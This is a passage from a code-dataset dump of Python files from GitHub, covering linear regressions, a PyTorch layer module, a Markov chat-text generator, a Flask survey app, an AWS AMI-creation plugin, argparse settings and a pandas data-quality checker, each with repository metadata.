as pd\nfrom io import StringIO\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n    csv_data = 'square_feet,price\\n150,6450\\n200,7450\\n250,8450\\n300,9450\\n350,11450\\n400,15450\\n600,18450\\n'\n    # read the CSV into a dataframe\n    df = pd.read_csv(StringIO(csv_data))\n    print(df)\n    x = df['square_feet'].values.reshape(-1, 1)\n    y = df['price']\n    # build the linear regression model\n    regr = linear_model.LinearRegression()\n    # fit\n    regr.fit(x, y)  # note the .reshape(-1, 1) above, because X is one-dimensional!\n    # the line's slope and intercept follow directly\n    a, b = regr.coef_, regr.intercept_\n    # area to be predicted\n    area = 238.5\n    # method 1: price computed from the line equation\n    print(\"price=\", a * area + b)\n    # method 2: price from the predict method\n    print(\"price predicted=\", regr.predict([[area]]))\n    # plotting\n    # 1. the actual points\n    plt.scatter(x, y, color='blue', label='real price')\n    # 2. the fitted line\n    plt.plot(x, regr.predict(x), color='red', linewidth=4, label='predicted price')\n    plt.xlabel('area')\n    plt.ylabel('price')\n    plt.legend(loc='lower right')\n    plt.show()\n", "repo_name": 
"KeXiangWang/course-of-big-data-and-AI-training", "sub_path": "1st/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 1164, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 9, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "12040901034", "text": "# -*- coding: utf-8 -*-\nimport torch.nn as nn\n#import torch.nn.functional as F\nfrom torchsummary import summary\n\n\"\"\"\nConv-Bn-Relu module\n\"\"\"\nclass ConvBnRelu(nn.Module):\n    def __init__(self,in_channels,out_channels,kernel_size,stride=1,\n                 padding=0,dilation=1,groups=1,relu6=False):\n        super(ConvBnRelu,self).__init__()\n        self.conv=nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)\n        self.bn=nn.BatchNorm2d(out_channels)\n        self.relu=nn.ReLU6(inplace=True) if relu6 else nn.ReLU(inplace=True) \n    \n    def forward(self,x):\n        x=self.conv(x)\n        x=self.bn(x)\n        x=self.relu(x)\n        return x\nif __name__ == \"__main__\":\n    convBR=ConvBnRelu(in_channels=3,out_channels=32,kernel_size=3,padding=1)\n    print(convBR)\n    summary(convBR, (3, 224, 224))\n", "repo_name": "cswhshi/Classical-Network", "sub_path": "LightWeight_Model/Module/ConvBnRelu.py", "file_name": "ConvBnRelu.py", "file_ext": "py", "file_size_in_byte": 856, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.ReLU6", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 15, "usage_type": "call"}, {"api_name": "torchsummary.summary", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "4396805964", "text": "\"\"\"Takes CSV, does a regression\nCHANGE FILE PATH ON LINE 15 to where your instances file is located\"\"\"\n\n\n\nfrom sklearn 
import linear_model\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as dates\nimport datetime as dt\nfrom sklearn import metrics\nfrom sklearn import svm\n\nlistx = []\nlisty = []\ngraphx = []\nwith open(\"instances_without_noise.txt\") as f:\n\tfor line in f:\n\t\tline = line.rstrip().split(\",\")\n\t\tlistx.append(line[2:])\n\t\tt = dt.datetime.strptime(line[1], \"%Y-%m-%d %H:%M:%S\")\n\t\tgraphx.append(dates.date2num(t))\nprint(\"instances loaded\")\nwith open(\"../data/price_series.txt\") as f:\n\tfor line in f:\n\t\tline = line.rstrip().split(\",\")\n\t\tlisty.append(float(line[-1]))\nX = np.array(listx, dtype='float64')\ny = np.array(listy, dtype='float64')\nprint(X.size)\nprint(y.size)\nprint(X)\nprint(y)\nreg = linear_model.Lasso(alpha = 0.1)\n#reg = svm.SVR(kernel='linear', epsilon=0.05)\nreg.fit(X, y)\nprint(\"model built\")\nprint(reg.score(X, y))\ntest_y = reg.predict(X)\nprint(\"R2\")\nprint(metrics.r2_score(y, test_y))\n# Plot outputs\n# Plot outputs\nplt.scatter(graphx, y, color='black')\nplt.plot(graphx, test_y, color='blue', linewidth=3)\n\nplt.xlabel('7-Apr-2018 to 13-Apr-2018 (delta = 1hr)')\nplt.ylabel('Bitcoin Value USD')\nplt.title('Regression Model')\nplt.gcf().autofmt_xdate()\nmyFmt = dates.DateFormatter('%m/%d')\nplt.gca().xaxis.set_major_formatter(myFmt)\n\nplt.show()\n\n\n#0.1858734448927718\n#0.14955317499263565\n\n", "repo_name": "marastaines/twittercrypto", "sub_path": "src/regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 1431, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.dates.date2num", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 34, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 51, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "10740049231", "text": "import re\nimport json\nimport pathlib\n\nimport markovify\n\n\ndef main():\n source_dir = pathlib.Path(\"./source_exported_chats\")\n\n model_sentences = []\n\n for file_path in source_dir.glob(\"*.json\"):\n print(f\"loading {file_path}...\")\n with open(file_path, \"rb\") as f:\n source_data = json.load(f)\n\n for message in source_data[\"messages\"]:\n if not message[\"text\"]:\n continue\n\n if isinstance(message[\"text\"], list):\n # print(message[\"text\"])\n for item in message[\"text\"]:\n if isinstance(item, str):\n text = item\n else:\n text = message[\"text\"]\n\n text = text.replace(\"'\", \"\").replace('\"', \"\")\n\n # sentences = re.split(', |_|-|!|\\+', text)\n chat_sentences = re.split(r\"(?')\ndef gen_ques(count):\n\tprint(session)\n\t##global ques_num\n\t# if count != len(session['responses']):\n\t# \tflash(\"You are attempting to access an invalid question\")\n\t# \treturn redirect(url_for('gen_ques', count = len(session['responses'])))\n\tquestion = satisfaction_survey.questions[count].question\n\tchoices = satisfaction_survey.questions[count].choices\n\treturn render_template('questions.html', question = question, choices = choices)\n\t\n\n@app.route('/answers', methods=[\"POST\"])\ndef answers():\n\tresponse = request.form['choice']\n\tans = session['responses']\n\tans.append(response)\n\tsession['responses'] = ans\n\tprint(session['responses'])\n\tprint(response)\n\tglobal ques_num\n\tif session[QUES_NUM] == len(satisfaction_survey.questions) - 1:\n\t\treturn redirect('/thank_you')\n\telse:\n\t\tques_num = session[QUES_NUM] + 1\n\t\tsession[QUES_NUM] = ques_num\n\t\treturn redirect(url_for('gen_ques', count = session[QUES_NUM]))\n\n@app.route('/thank_you')\ndef thanks():\n\tsurvey_title = satisfaction_survey.title\n\treturn render_template('thank_you.html', title = survey_title)", "repo_name": "jat22/flask-survey", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask_debugtoolbar.DebugToolbarExtension", "line_number": 9, "usage_type": "call"}, {"api_name": "surveys.satisfaction_survey.title", "line_number": 16, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 16, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.instructions", "line_number": 17, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 28, "usage_type": "argument"}, {"api_name": 
"surveys.satisfaction_survey.questions", "line_number": 33, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 33, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.questions", "line_number": 34, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 47, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.questions", "line_number": 47, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 52, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.title", "line_number": 56, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "30328906210", "text": "from common.methods import set_progress\nfrom infrastructure.models import Server\n\ndef run(job, logger=None):\n # Get server & power status\n server = job.server_set.first()\n server_original_power_status = server.power_status\n \n # Power off VM (optional)\n #if server_original_power_status != \"POWEROFF\":\n # set_progress(\"Powering off server.\")\n # task = server.power_off()\n # -->add timeout here to wait for shutdown\n\n # Connect to AWS\n e = server.environment\n set_progress(\"Connecting to EC2 region {}.\".format(e.aws_region), logger, job)\n rh = server.resource_handler\n aws = rh.cast()\n aws.connect_ec2(e.aws_region)\n ec2 = aws.resource_technology.work_class.ec2\n\n # Get instance-id & region\n instance_id = server.resource_handler_svr_id\n\n # Create AMI from instance\n #http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/Creating_EBSbacked_WinAMI.html\n ec2.create_image(instance_id, name='{{ AMIname }}', description='Created via CloudBolt')\n return \"\",\"\",\"\"\n", "repo_name": "CloudBoltSoftware/cloudbolt-forge", "sub_path": "actions/cloudbolt_plugins/aws/create_image/create_image_from_instance.py", "file_name": "create_image_from_instance.py", "file_ext": "py", "file_size_in_byte": 1031, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "41", "api": [{"api_name": "common.methods.set_progress", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "74783864122", "text": "import yaml\nimport argparse\n\ndef load_arguments_from_yaml(filename):\n with open(filename, 'r') as file:\n config = yaml.safe_load(file)\n return config\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Data-Centric Learning from Unlabeled Graphs with 
Diffusion Model')\n parser.add_argument('--gpu-id', type=int, default=0,\n help='which gpu to use if any (default: 0)')\n parser.add_argument('--num-workers', type=int, default=0,\n help='number of workers for data loader')\n parser.add_argument('--no-print', action='store_true', default=False,\n help=\"don't use progress bar\")\n\n parser.add_argument('--dataset', default=\"ogbg-molsider\", type=str,\n choices=['plym-density', 'plym-oxygen', 'plym-melting', 'plym-glass', 'plym-thermal',\n 'ogbg-mollipo', 'ogbg-molfreesolv', 'ogbg-molesol', \n 'ogbg-molhiv', 'ogbg-molbace', 'ogbg-molbbbp', 'ogbg-molclintox','ogbg-molsider','ogbg-moltox21','ogbg-moltoxcast'],\n help='dataset name (plym-, ogbg-)')\n \n # model\n parser.add_argument('--model', type=str, default='gin-virtual',\n help='GNN gin, gin-virtual, or gcn, or gcn-virtual (default: gin-virtual)')\n parser.add_argument('--readout', type=str, default='sum',\n help='graph readout (default: sum)')\n parser.add_argument('--norm-layer', type=str, default='batch_norm', \n help='normalization layer (default: batch_norm)')\n parser.add_argument('--drop-ratio', type=float, default=0.5,\n help='dropout ratio (default: 0.5)')\n parser.add_argument('--num-layer', type=int, default=5,\n help='number of GNN message passing layers (default: 5)')\n parser.add_argument('--emb-dim', type=int, default=300,\n help='dimensionality of hidden units in GNNs (default: 300)')\n # training\n parser.add_argument('--batch-size', type=int, default=512,\n help='input batch size for training (default: 512)')\n parser.add_argument('--patience', type=int, default=50,\n help='patience for early stop')\n parser.add_argument('--trails', type=int, default=5,\n help='number of experiments (default: 5)') \n parser.add_argument('--lr', '--learning-rate', type=float, default=1e-2,\n help='Learning rate (default: 1e-2)')\n parser.add_argument('--wdecay', default=1e-5, type=float,\n help='weight decay')\n parser.add_argument('--epochs', type=int, default=300,\n help='number of epochs to train')\n parser.add_argument('--initw-name', type=str, default='default',\n help=\"method to initialize the model parameter\")\n # augmentation\n parser.add_argument('--start', type=int, default=20,\n help=\"start epoch for augmentation\")\n parser.add_argument('--iteration', type=int, default=20,\n help='epoch to do augmentation')\n parser.add_argument('--strategy', default=\"replace_accumulate\", type=str,\n choices=['replace_once', 'add_once', 'replace_accumulate', 'add_accumulate'],\n help=' strategy about how to use the augmented examples. 
\\\n Replace or add to the original examples; Accumulate the augmented examples or not')\n parser.add_argument('--n-jobs', type=int, default=22,\n help='# process to convert the dense adj input to pyg input form')\n parser.add_argument('--n-negative', type=int, default=5,\n help='# negative samples to optimize the augmented example')\n parser.add_argument('--out-steps', type=int, default=5,\n help='outer sampling steps for guided reverse diffusion')\n parser.add_argument('--topk', type=int, default=100,\n help='top k in an augmentation batch ')\n parser.add_argument('--aug-batch', type=int, default=2000,\n help='the augmentation batch compared to training batch')\n parser.add_argument('--snr', type=float, default=0.2,\n help='snr')\n parser.add_argument('--scale-eps', type=float, default=0,\n help='scale eps')\n parser.add_argument('--perturb-ratio', type=float, default=None,\n help='level of noise for perturbation')\n args = parser.parse_args()\n print('no print',args.no_print)\n\n ## n_steps for solver\n args.n_steps = 1\n return args", "repo_name": "liugangcode/data_centric_transfer", "sub_path": "configures/arguments.py", "file_name": "arguments.py", "file_ext": "py", "file_size_in_byte": 4754, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "yaml.safe_load", "line_number": 6, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "33325160192", "text": "#https://github.com/Miserlou/lambda-packages\n#https://chrisalbon.com/python/data_wrangling/pandas_regex_to_create_columns/\nimport json\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport numpy as np\nimport os\nfrom scipy import stats\nimport pprint\n\n#import regex as re\nfrom datetime import datetime\n\nfrom ProblemFinder import ProblemFinder\nfrom ProblemFixer import ProblemFixer\n\npd.set_option('display.max_columns', 20)\n#from typing import List\n\ncol_need=[\"Order Item Id\" ,\"Order Type\" ,\"Lazada Id\" ,\"Seller SKU\",\"Lazada SKU\",\"Created at\",\"Updated at\"]\ncol_optional=[]\n\ndata_path = 'Data//retail_DS.csv'\ndata_path = 'Data//orderDataFlat.csv'\n#missing_values = [\"n/a\", \"na\", \"--\"]\n#na_values = missing_values\ndf = (pd.read_csv(data_path))\n\n#print(df.head())\n\n\n\n#accented_string = \"CARROT ËêùÂçú\"git commit \"\"\n# accented_string is of type 'unicode'\n#import unidecode\n#print(unidecode.unidecode(accented_string))\n\n \n#* try to convert column value to int and calculate errors\ndef calculate_conversion_errors(df_column):\n cnt=0\n errors=[]\n for row in df_column:\n try:\n int(row)\n except ValueError:\n print(row)\n errors.append(cnt)\n pass\n cnt+=1\n return errors\n\n#* Try to remove letters and keep numbers \ndef remove_letters_from_column(df_column):\n return pd.to_numeric(df_column.astype(str).str.replace(r'\\D', '') , errors='ignore')\n\n#* Calculate negative values for numeric columns\ndef calculate_negative_values(df_column):\n return df_column.lt(0).sum()\n\ndef calculate_numerical_outliers_Z(df, col_name, z_thresh=1):\n # Constrains will contain `True` or `False` depending on if it is a value below the threshold.\n constrains = df[[col_name]].select_dtypes(include=[np.number]) \\\n .apply(lambda x: np.abs(stats.zscore(x)) < z_thresh, result_type='broadcast').all(axis=1)\n # Drop (inplace) values set to be rejected\n #df.drop(df.index[~constrains], inplace=True)\n return constrains[constrains==False].shape[0]\n #return 
df[[col_name]].shape[0] - df[[col_name]].index[constrains].shape[0]\n\ndef calculate_number_outliers_IRQ(df, col_name, low=0.25, high=0.75):\n Q1 = df[col_name].quantile(low)\n Q3 = df[col_name].quantile(high)\n IQR = Q3 - Q1\n outliers = ((df[col_name] < (Q1 - 1.5 * IQR)) |(df[col_name] > (Q3 + 1.5 * IQR))) \n return df[outliers].shape[0]\n\ndef Analysys(path, filename):\n print(path)\n df = pd.read_csv(path)\n A=ProblemFinder(df)\n \n id_columns=A.columns_ids()\n constant_columns=A.columns_constant_vales()\n currency_columns=A.columns_currency()\n msv_table_all=A.missing_zero_values_table()\n mcv_columns=list(msv_table_all.index)\n\n\n #* Check numeric columns\n numeric_columns=A.get_numeric_columns()\n if numeric_columns:\n #msv_table=msv_table_all.loc[numeric_columns,\"Missing Values\"].fillna(0)\n\n msv_dict={num_column:{\"Missing values\":int(msv_table_all.loc[num_column,\"Missing Values\"]) \n if num_column in mcv_columns else 0} \n for num_column in numeric_columns}\n msv_percent_dict={num_column:{\"Data Audit, %\":int(msv_table_all.loc[num_column,\"Data Audit\"]) \n if num_column in mcv_columns else 0} \n for num_column in numeric_columns }\n #print(msv_percent_dict)\n \n negv_dict={num_column:{\"Negative values\":int(calculate_negative_values(A.df[num_column]))} \n for num_column in numeric_columns}\n \n outliers_dict={num_column:{\"Outliers\":int(calculate_numerical_outliers_Z(A.df,num_column)) \n if (num_column not in constant_columns and num_column not in id_columns) else 0}\n for num_column in numeric_columns }\n \n id_dict={ num_column:{\"ID column\":True if num_column in id_columns else False} \n for num_column in numeric_columns }\n const_dict={ num_column:{\"Constant column\":True if num_column in constant_columns else False} \n for num_column in numeric_columns }\n duplicates_dict={num_column:{\"Number of duplicates\":int(A.number_duplicates_column(num_column))} \n for num_column in numeric_columns}\n currency_dict={ num_column:{\"Currency column\":True if num_column in currency_columns else False} \n for num_column in numeric_columns }\n type_dict={num_column:{\"Type\":\"Numeric\"} for num_column in numeric_columns} \n final_numeric={key: {**value,**negv_dict[key], **msv_percent_dict[key],\n **outliers_dict[key],**id_dict[key], \n **const_dict[key],**duplicates_dict[key],\n **currency_dict[key],\n **type_dict[key]\n } for key, value in msv_dict.items()}\n #pprint.pprint(final_numeric)\n\n #* check \"object\" columns\n object_columns=A.type_columns_dict().get(\"object\",None)\n if object_columns:\n #msv_table=msv_table_all.loc[object_columns,\"Missing Values\"].fillna(0)\n msv_dict={num_column:{\"Missing values\":int(msv_table_all.loc[num_column,\"Missing Values\"])\n if num_column in mcv_columns else 0} \n for num_column in object_columns}\n \n msv_percent_dict_string={num_column:{\"Data Audit, %\":int(msv_table_all.loc[num_column,\"Data Audit\"]) \n if num_column in mcv_columns else 0} \n for num_column in object_columns }\n \n id_dict={ num_column:{\"ID column\":True if num_column in id_columns else False} \n for num_column in object_columns }\n const_dict={ num_column:{\"Constant column\":True if num_column in constant_columns else False} \n for num_column in object_columns }\n duplicates_dict={num_column:{\"Number of duplicates\":int(A.number_duplicates_column(num_column))} \n for num_column in object_columns}\n currency_dict={ num_column:{\"Currency column\":True if num_column in currency_columns else False} \n for num_column in object_columns }\n 
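# Aside: the final_* tables here are assembled by merging the per-column dicts with\n # dict unpacking; with hypothetical inputs, first = {'col': {'x': 1}} and\n # other = {'col': {'y': 2}}, the pattern {k: {**v, **other[k]} for k, v in first.items()}\n # yields {'col': {'x': 1, 'y': 2}} - one row of issue flags per column.\n 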
type_dict={num_column:{\"Type\":\"String\"} for num_column in object_columns} \n final_object ={key: {**value, **id_dict[key], \n **const_dict[key],**duplicates_dict[key],\n **currency_dict[key],\n **msv_percent_dict_string[key],\n **type_dict[key]\n\n } for key, value in msv_dict.items()}\n #pprint.pprint(final_object)\n\n #* check datetype columns\n datetime_columns=A.type_columns_dict().get(\"datetime64[ns]\",None)\n\n #print(datetime_columns)\n #print(msv_table_all.index)\n #print(mcv_columns)\n if datetime_columns:\n msv_dict={dt_column:{\"Missing values\":int(msv_table_all.loc[dt_column,\"Missing Values\"]) if dt_column in mcv_columns else 0 } \n for dt_column in datetime_columns}\n id_dict={ dt_column:{\"ID column\":True if dt_column in id_columns else False} \n for dt_column in datetime_columns }\n const_dict={ dt_column:{\"Constant column\":True if dt_column in constant_columns else False} \n for dt_column in datetime_columns } \n #outliers_dict= A.datetime_ouliers(A.df[datetime_columns],2)\n \n msv_percent_dict_dt={dt_column:{\"Data Audit, %\":int(msv_table_all.loc[dt_column,\"Data Audit\"]) \n if dt_column in mcv_columns else 0} \n for dt_column in datetime_columns }\n \n type_dict={dt_column:{\"Type\":\"Datetime\"} for dt_column in datetime_columns} \n final_datetime ={key: {**value, **id_dict[key], \n **const_dict[key],\n # **outliers_dict[key],\n **msv_percent_dict_dt[key], \n **type_dict[key]\n } for key, value in msv_dict.items()}\n\n\n print(A.df.shape[1])\n print(len(final_numeric.keys())+len(final_object.keys())+len(final_datetime.keys()))\n all_col=A.df.columns\n processed_col=list(final_numeric.keys())+list(final_object.keys())+list(final_datetime.keys())\n print(list(set(all_col) - set(processed_col)))\n final_all={**final_numeric,**final_object,**final_datetime}\n \n final=dict()\n final[\"file_name\"]=\"{}_issue_report.json\".format(filename)\n final[\"Row duplicates\"]=A.duplicates_in_dataset()\n final[\"Total rows\"]=A.df.shape[0]\n final[\"Total columns\"]=A.df.shape[1]\n final[\"Columns\"]=final_all\n with open(\"issue_reports\\\\\"+final[\"file_name\"], 'w') as outfile:\n json.dump(final, outfile)\n print(\"DONE\")\n\n\ndf1=pd.DataFrame({'date': [1546315200,\t1545553318,\t1545553318,\"2019/09/08\"],\n 'date_new': [\"2019/09/08\",\tnp.nan,\tnp.nan,\"2019/09/11\"],\n \"string\":[\"BEETROOT������ʆ?\",\"CARROT ËêùÂçú\",\"CARROT ËêùÂçú\",\"CARROT ËêùÂçú\"],\n \"negative\":[0, 3, -9, -90]})\n\n\n\nprint(df1)\n\ndata_path = 'Data//orderDataFlat.csv'\n\nimport glob\npath = \"Data//*.csv\"\n#for fname in glob.glob(path):\n# print(fname)\n# Analysys(fname.replace(\"\\\\\",\"//\"), fname.split(\"\\\\\")[1].split(\".\")[0])\n#print(df.columns)\n#print(df[\"notes\"].head())\n\n\n#print(df['notes'].unique().tolist())\n#print(df.isnull().sum())\n\n#P=ProblemFinder(df)\n#df_short=df[\"notes\"].head(100)\n#print(df_short.isnull().sum())\n#print(P.df.isnull().sum())\n#print(P.missing_zero_values_table())\n\n\n\n\n#A=ProblemFinder(df)\n#print(A.columns_ids())\n\n#P=ProblemFixer(df)\n#print(P.df.head())\n\n#for col in df.columns:\n# if (col.dtypes == object ) or (col.dtypes == \"int64\" and df[col].mean()>1262304000 ):\n# df[col]=pd.to_datetime(df[col], errors='ignore',unit='s')\n#print(df.head())\n\n#print(calculate_number_outliers_IRQ(df, \"negative\"))\n\n#df[\"date_new\"]=df[\"date_new\"].interpolate(method='time', limit=1)\n#print(type(df.dtypes))\n#[print(k) for k,v in df.dtypes.items() if v==\"object\"]\n\n#df = 
(pd.read_csv(data_path))\n#P=ProblemFixer(df)\n#[P.remove_special_characters(k) for k,v in P.df.dtypes.items() if v==\"object\"]\n#print(P.df.head())\n#print(P.df.dtypes)\n#P.df[\"timeDelivered\"]=pd.to_datetime(P.df[\"timeDelivered\"], errors='ignore',unit='s')\n#print(P.df[\"timeDelivered\"].head())\n\n#P.remove_special_characters(\"string\")\n#print(P.df.head())\n#df[\"string\"]=df[\"string\"].apply(lambda x: strip_accents(x) )\n#print(df.head())\n# accented_string is of type 'unicode'\n\n\n#P=ProblemFixer(df)\n#print(P.df.head())\n\n#log=pd.DataFrame(columns=['time', 'level', 'message'])\n#log=log.append({'time': datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"), 'level': \"INFO\", 'message': \"TEST\"}, ignore_index=True)\n#print(log)\n#df = pd.DataFrame()\n#df = df.append({'name': 'Zed', 'age': 9, 'height': 2}, ignore_index=True)\n#print(df)\n#P.extract_year_month_date(\"date\")\n#print(P.logger)\n#P.logger_save(\"test_log.log\")\n\n#df['date'] = pd.to_datetime(df['date'], errors='ignore', unit='s')\n#df[\"date\"]=pd.to_datetime(df[\"date\"], errors='ignore', dayfirst=False, utc=None,\n# box=True, format=None, coerce=False, unit='ns')\n\n\n\n\n\n\n\n\n\n'''\ndf = pd.DataFrame({'A': ['7','7','9A'],\n# 'B': np.random.rand(3),\n 'C': ['foo','foo','baz'],\n 'D': ['who','who','when'],\n \"Currency\":[\"123\",\"123\",\"€34234\"]\n })\n\n_, idx = np.unique(df, axis = 1, return_index=True)\ndf = df.iloc[:, idx]\nprint(df)\n\n\ncol_list=[]\nfor col in df.columns:\n if df[col].dtype == \"object\":\n if (True in set(df[col].str.contains(r'(\\£|\\$|\\€)' , regex=True).unique())):\n col_list.append(col)\n\ncol_currency=list(filter(lambda x: x != None,[ col \n if True in set(df[col].str.contains(r'(\\£|\\$|\\€)' , regex=True).unique()) \n else None \n for col in df.columns if df[col].dtype == \"object\"] ))\nprint(col_currency)\n\n\n\n#A.df = A.df.apply(lambda x: np.nan if isinstance(x, str) and (x.isspace() or not x) else x)\n#A.df=A.df.replace(r'^\\s*$', np.nan, regex=True)\n#print(A.missing_zero_values_table().head().loc[\"Customer Email\", : ])\n#print(A.df[\"Customer Email\"].unique())\n\n#df.columns=[col.strip() for col in df.columns]\n#print(df[\"Customer Email\"].dtype)\n#df=df.replace('', np.nan).apply(lambda x: x.astype(str).str.upper().str.strip() if x.dtype == \"object\" else x)\n#print(df[\"Customer Email\"].dtype)\n#print(df[\"Customer Email\"].unique())\n\n#df = pd.DataFrame({'A': [7,-8,-9],\n# 'B': np.random.rand(3),\n# 'C': ['foo','bar','baz'],\n# 'D': ['1who','what','when']})\n\n#print(calculate_negative_values(df[\"A\"]))\n#print(df)\n#\n#for col in df.columns:\n# df[col] = 